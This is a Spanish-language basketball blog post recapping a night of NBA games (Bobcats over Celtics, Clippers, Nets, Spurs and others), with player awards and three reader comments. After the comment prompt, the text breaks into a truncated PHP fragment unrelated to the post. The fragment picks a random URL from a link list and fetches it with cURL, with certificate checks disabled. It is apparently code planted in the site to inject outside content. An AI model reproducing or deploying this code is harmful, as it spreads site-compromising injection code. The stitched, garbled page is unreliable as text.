La Crónica: Festival visitante

12 de February de 2013 por Simon

Jornada con ocho partidos en la noche del lunes que se saldaron todos con victoria para los equipos que actuaban como visitantes a excepción de los Bobcats que consiguieron aprovechar el desgaste que Boston había sufrido la noche anterior ante Denver para romper la racha de 7 derrotas seguidas que acumulaban y de paso, romper  la de victorias de los Celtics. El partido estuvo igualado durante toda la noche con Boston llevando la delantera durante casi todo el tiempo. A falta de 2 minutos los verdes mandaban por 4 en el marcador pero los locales se las arreglaron para no dejarles anotar más y un triple de Henderson y una canasta de Sessions los pusieron por encima en el marcador y les otorgó una victoria inesperada aunque previsible viendo las circunstancias (91-94).  Mullens fue el mejor de Charlotte con 25 puntos y 18 rebotes. La mala noticia para Boston fue la pérdida por lesión de Leandro Barbosa cuya rodilla no pinta bien.

Los Clippers ya están a pleno rendimiento tras la vuelta de Cris Paul y ayer le tocó a Philadelphia sufrirlos. Una gran primera parte de los angelinos dejó el partido sentenciado en el descanso (107-90). El duelo individual de bases All-Star apenas existió pues Chris Paul estuvo totalmente imparable y en apenas 24 minutos de juego logró 21 puntos (9/11 en tiros de campo) a los que añadió 11 asistencias y 5 robos. Paul estuvo acompañado en la veintena de puntos por Griffin y Crawford. Por parte de Philadelphia solo Nick Young estuvo a buen nivel con 29 puntos aunque aprovechando mucho los minutos de la basura, básicamente todo el segundo tiempo. 

Jornada perfecta para Brooklyn Nets la de anoche, que vieron como dos rivales directos por la tercera plaza del Este perdieron. Fueron los propios Nets los que lograron derrotar a Indiana Pacers. Con la baja de Deron Williams, el resto del quinteto aunó esfuerzos y aprovecharon el pésimo partido de los dos mejores jugadores de Indiana. Entre George y West se marcaron un 3/21 en tiros de campo pero aún así Brooklyn necesitó de una prórroga para doblegarlos (89-84).  Brook López consiguió 25 puntos y 8 rebotes y estuvo bien ayudado en la zona por Evans que capturó él solito 22 rebotes. En Indiana finalmente no regresó a la acción Danny Granger que esperará y lo hará tras el All-Star weekend.

En el United Center, el líder de la liga tenía una noche complicada pues a la visita a los Bulls se sumaba que ninguno de sus tres pilares jugaba. A pesar de ello San Antonio demostró una vez más que este equipo está hecho de otra pasta y tienen una profunda plantilla y fueron Kawhi Leonard y Danny Green los que se echaron el equipo a las espaldas  y lideraron a los de Popovich a la victoria (103-89). En Chicago Hamilton y Robinson fueron los mejores con  20 y 16 puntos, respectivamente. En el lado de San Antonio todos sumaron en un día comprometido para ellos y sacaron una gran victoria que les permite mantener la ventaja sobre Oklahoma City.

En el resto de partidos de la jornada, en Cleveland vivíamos un duelo entre los dos bases compañeros de promoción, Irving y Rubio, que se saldó con empate técnico: 20 puntos y 7 asistencias para Irving y 13 puntos, 10 pases de canasta  y victoria para Rubio (100-92).  New Orleans venció a Detroit con solvencia (105-86).  Washington venció a domicilio a Milwaukee en un mal partido de Jennings (102-90). Si los Bucks no reaccionan pronto perderán su plaza de Play Off a nada que los Sixers se entonen un poco. Por último, Dallas Mavericks perdió en casa debido a un gran partido de Josh Smith que llevó a la victoria a unos Hawks que cada vez  se ven más acechados por Boston Celtics (105-101)

PREMIOS

MVP: Cuarteto de oro. Josh Smith acabó el partido con 26 puntos, 13 rebotes y 6 asistencias; Byron Mullens, con 25 puntos, 18 rebotes y 4 asistencias; Nene, con 21 puntos, 13 rebotes y 6 asistencias, y Chris Paul, con 21 puntos y 11 asistencias. Todos se llevaron la victoria. ¿Qué más se puede pedir?

Rookie: Ayer pegó fuerte Bradley Beal que fue clave en la victoria de su equipo con 28 puntos, 4 rebotes, 2 asistencias, 2 robos y 2 tapones.

Sorpresa: Reggie Evans solo sirve para una cosa: capturar rebotes. Ayer cumplió ese trabajo a la perfección y se fue a las 22 capturas. ¡Carpanta!

Decepción:  Terrible día para Paul George. Se quedó en 5 puntos tras fallar 9 de sus 10 tiros a canasta.

Esfuerzo en vano: Monta Ellis jugó un partido completísimo pero estuvo demasiado solo ante los Wizards. Sus 24 puntos, 7 rebotes, 8 asistencias y 6 robos fueron insuficientes para llevarse la victoria.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Otra lesión para los Celtics, a este paso va a tener que salir a jugar Rivers y no vale decir que son veteranos porque son precisamente los jóvenes los que se están lesionando.
    Ayer aguantaron la falta de piernas y tenían el partido encarrilado a dos minutos para el final con +4 y posesión pero se les fundieron los plomos y los Bobcats dieron la vuelta al partido. Ahora, rota la racha habrá que ver si continúa el efecto “post-Rondo” o vuelven a ir para abajo.
    Del resto de la jornada no deja de maravillar el equipo de San Antonio. No importa quien juegue ni donde, todos contribuyen sin excusas y yendo siempre a por la victoria. Dicho esto, y con la gran victoria que supone ganar en Chicago sin ninguno de sus tres mejores jugadores, la salud es precisamente su máxima incógnita. Cuando llegue la hora de la verdad les necesitarán sanos a los tres si quieren plantar cara a los cocos del Oeste en PO.
    Los Clippers una vez recuperados los lesionados parecen tirar de nuevo hacia arriba. Su mala racha les ha sacado de rueda por el primer puesto pero si vuelven a jugar a su máximo nivel deberían asegurar al menos la tercera plaza del Oeste.
    Y vaya charanga la de los Lakers, entre lesiones, discusiones, padres que dicen lo que sus hijos piensan (Howard) y que ven la hecatombe de quedar fuera de PO cerca parece difícil que aúnen esfuerzos para salir del pozo.

      Citar

  2. GreenPride dice:
    #2

    Por lo que se comenta, parece que Leandro Barbosa será baja para lo que resta de la temporada. Lo que era uno de los equipos más profundos de la liga se encuentra con 3 bajas para toda la temporada (Rondo, Sullinger y Barbosa). Los Celtics no se rendirán pero desde luego les ha mirado un tuerto y parece casi imposible que así puedan hacer algo esta temporada. Lástima de un equipo llamado a pelear el anillo a pesar de su mal record en la primera mitad de la temporada y que con estas bajas queda casi descartado. A los aficionados verdes como este que escribe sólo les queda disfrutar de las lecciones de orgullo y clase que a pesar de todo seguirán dando de vez en cuando estos Celtics

      Citar

  3. Denise dice:
    #3

    ¿El Big 3 de Spurs no jugó porque Popovych les dio descanso como aquella vez que estaban lesionados?

    Al parecer, los Suns infoman que todos sus jugadores son susceptibles de entrar en un traspaso, eso es otra forma de decir, ninguno me valeis para mi proyecto…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>